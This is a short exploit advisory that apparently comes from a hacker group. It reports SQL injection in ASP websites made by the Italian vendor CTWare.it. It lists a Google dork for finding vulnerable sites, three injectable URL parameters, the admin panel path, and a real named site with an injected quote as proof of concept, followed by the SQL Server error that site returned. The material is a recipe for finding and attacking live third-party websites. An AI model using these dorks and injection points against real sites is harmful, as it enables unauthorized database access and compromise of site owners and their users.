#################################################################################################
# Exploit Title : Copyright CTWare.it © 2014-2018 Italy SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 04/06/2018
# Vendor Homepage : ctware.it
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Google Dork : intext:''copyright CTWARE © 2014-2018''
# Exploit : /news.asp?id=[SQL Injection]
# Exploit : /pagina.asp?id=[SQL Injection]
# Exploit : /pagina.asp?id=[ID-NUMBER]%20&m=[SQL Injection]
# Admin Panel Path : /admin
#################################################################################################
# Example Site => ordinearchitetticatania.it/news.asp?id=377%27 => [ Proof of Concept ] => archive.is/ZCnM4
# SQL-DB Error =>
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/admin/include/funzioni.asp, line 90
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################